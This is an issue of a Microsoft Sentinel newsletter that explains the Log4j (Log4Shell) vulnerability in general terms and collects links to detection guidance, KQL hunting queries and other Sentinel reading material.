View profile

Microsoft Sentinel this Week - Issue #42 - Out-of-Band Log4j Edition

Microsoft Sentinel this Week
Microsoft Sentinel this Week - Issue #42 - Out-of-Band Log4j Edition
By Rod Trent • Issue #42 • View online
Good day all! For a lot of you, this weekend was busy, sometimes confusing, and definitely demanding due to the Log4j crisis.
As you know this newsletter delivers every Friday - except, as noted last issue that the newsletter would not deliver until the new year due to the holidays and my taking time off to spend time with family and friends.
So, this newsletter issue is definitely an out-of-band experience. But with the ongoing effort to identify and control the Log4J outbreak, I believe it’s important to deliver this newsletter now instead of waiting until January 7th.
There’s still a lot of awesome, accumulated and curated content in this newsletter issue below, but the focus here is more about getting all of you the necessary information about how to deal with Log4j with Microsoft Sentinel.
I absolutely love this community. There’s been a mighty effort by this community to get a handle on this outbreak and many, many people have dedicated their time over the weekend to create and offer solutions for everyone. It just doesn’t get any better than that.
What is it?
In its simplest terms, a zero day vulnerability in Log4j (also now known as “Log4Shell”) can allow unauthenticated remote code execution and access to servers. Researchers have reported that there are 100 attempts to exploit this vulnerability a minute, leading to hundreds of thousands of attempts since it was discovered just a few days ago - but that it has probably been an active exploit for some time before it was publicly disclosed.
NewScientist explains it this way…
Almost every bit of software you use will keep records of errors and other important events, known as logs. Rather than creating their own logging system, many software developers use the open source Log4j, making it one of the most common logging packages in the world.
Not having to reinvent the wheel is a huge benefit, but the popularity of Log4j has now become a global security headache. The flaw affects millions of pieces of software, running on millions of machines, which we all interact with.
And the impact could be huge, producing crypto mining malware or installing Cobalt Strike on vulnerable systems which would lead to the mass theft of usernames and passwords. But that’s just a sampling of the potential for impact.
I believe Florian Roth said it best…
What people seem to miss:
The #Log4Shell vulnerability isn’t just a RCE 0day. 
It’s a vulnerability that causes hundreds and thousands of 0-days in all kinds of software products. 
It’s a 0-day cluster bomb.
Log4j is used by millions of web servers, which also relates to the apps that rely on those web servers’ services. For example, anyone using Okta for identity services should be aware that the Radius Server agent is vulnerable. VMware, another example, has a long list of impacted products. So, don’t think you’re safe just because you don’t run a web server.
With that, here’s some highlights for your Microsoft Sentinel (and other Defender products) environments.
Our own guidance provides information about the vulnerability, and talks about how Defender, Defender for Endpoint, Defender for Cloud, and Microsoft Sentinel can be used to detect and alert on it.
Microsoft MVP and Cloud IR, Eli Shlomo, has provided an amazing diagram of the exploit (originally provided by the National Cyber Security Centre (NCSC), Computer Security Incident Response Team of the Swiss Government), recommendations, and a lab environment to simulate the exploit for detections.
Matt Zorich, the purveyor of the #365daysofkql operation, has posted a KQL query to show how to use parsing to create your own detections.
P.S. As of today, Matt is up to day 66. If you’re interested in KQL, you should follow the hashtag on Twitter.
For those customers that are using Microsoft Sentinel alongside another SIEM, SOC Prime has multi SIEM detections, including Microsoft Sentinel (though SOC Prime is still stuck on the old “Azure” Sentinel name in most places)
The following hunting query looks for possible attempts to exploit a remote code execution vulnerability in the Log4j component of Apache:
Olaf Hartong, from FalconForce, has provided several KQL queries for detecting the vulnerability in LDAP, DNS, Zscaler, Fortinet, Check Point, Application Gateway and others.
I hope this newsletter issue provides value for you instead of leaving you with further questions around Log4j and its potential impact.
As noted last issue, I’m taking time off for the holidays and this newsletter will return in force in January. But who knows? You may see and hear from me again if I’m needed.
The rest of this newsletter issue is the normal fare.
Talk soon.

Stuff to Read
Must Learn KQL Part 7: Schema Talk – Azure Cloud & AI Domain Blog
Must Learn KQL Part 8: The Where Operator – Azure Cloud & AI Domain Blog
The Microsoft Security Operations Guide Contains Microsoft Sentinel Templates for Things to Monitor – Azure Cloud & AI Domain Blog
Choosing Not to See Tables without Data in the Microsoft Sentinel Console – Azure Cloud & AI Domain Blog
Microsoft Sentinel Azure AD Connector Log Breakdown
Threat Hunting AWS CloudTrail with Sentinel: Part 3 - Binary Defense
Migrate alert rules to another Azure Sentinel in the same tenant -Notes of Azure Security + Governance
When does enabling Microsoft Sentinel make sense?
Investigating Suspicious Azure Activity with Microsoft Sentinel - Microsoft Tech Community
Threat Hunting in Microsoft Sentinel (part 1)
Threat Hunting in Microsoft Sentinel (part 2)
Stuff to Watch/Listen To
Overview of the SOC Process Framework
KQL Framework for Microsoft Sentinel - Empowering You to Become KQL-Savvy
Demo: Microsoft Sentinel Zero Trust (TIC 3.0) Workbook
Stuff to Have
Sentinel-Queries/CVE-2021-44228-2.kql at main · reprise99/Sentinel-Queries · GitHub
SentinelKQL/EPSforM365AdvancedTables.txt at master · rod-trent/SentinelKQL · GitHub
Sentinel-Queries/Identity-VisualizeSSPR.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-DetectNewAlerts.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-FindRecipientsofPotentialPhishing.kql at main · reprise99/Sentinel-Queries · GitHub
SentinelKQL/TableData.txt at master · rod-trent/SentinelKQL · GitHub
Sentinel-Queries/SecurityAlert-ParseMaliciousFileInfoandFindDeviceEvents.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/Audit-ListBulkActivities.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/DNS-FindDevicesThatHaveQueriedSuspiciousDomains.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityAlert-VisualizeTopPhishingDomains.kql at main · reprise99/Sentinel-Queries · GitHub
Sentinel-Queries/SecurityEvent-DailySummaryofGroupAdditions.kql at main · reprise99/Sentinel-Queries · GitHub
Stuff to Attend
Becoming a Microsoft Sentinel Expert - Cloud Academy
Stuff That's New or Updated
Microsoft Sentinel - SAP continuous threat monitoring workbooks - Microsoft Tech Community
Stuff That's Related
Public preview: Azure Monitor action rules are now 'alert processing rules' | Azure updates | Microsoft Azure
What’s Next in Security - Home - Home page
General availability: Audit Logs of Azure Monitor log queries | Azure updates | Microsoft Azure
Announcing New Security Management Capabilities for Microsoft Defender for Endpoint. - Microsoft Tech Community
Stuff from the News
Guidance for preventing, detecting, and hunting for CVE-2021-44228 Log4j 2 exploitation - Microsoft Security Blog
New research shows IoT and OT innovation is critical to business but comes with significant risks - Microsoft Security Blog
NICKEL targeting government organizations across Latin America and Europe - Microsoft Security Blog
Protecting people from recent cyberattacks - Microsoft On the Issues
Rabobank grows a safer global IT landscape with Microsoft Security solutions
Gavriella Schuster Joins Open Systems Board Amid MDR Security Push - ChannelE2E
Sumo Logic CEO Sees MDR, EDR and MSSP Partner Opportunities - MSSP Alert
Did you enjoy this issue?
Rod Trent

The Microsoft Sentinel weekly newsletter helps uncover the new and important features and news for Microsoft's cloud-based SIEM+SOAR security tool.

In order to unsubscribe, click here.
If you were forwarded this newsletter and you like it, you can subscribe here.
Powered by Revue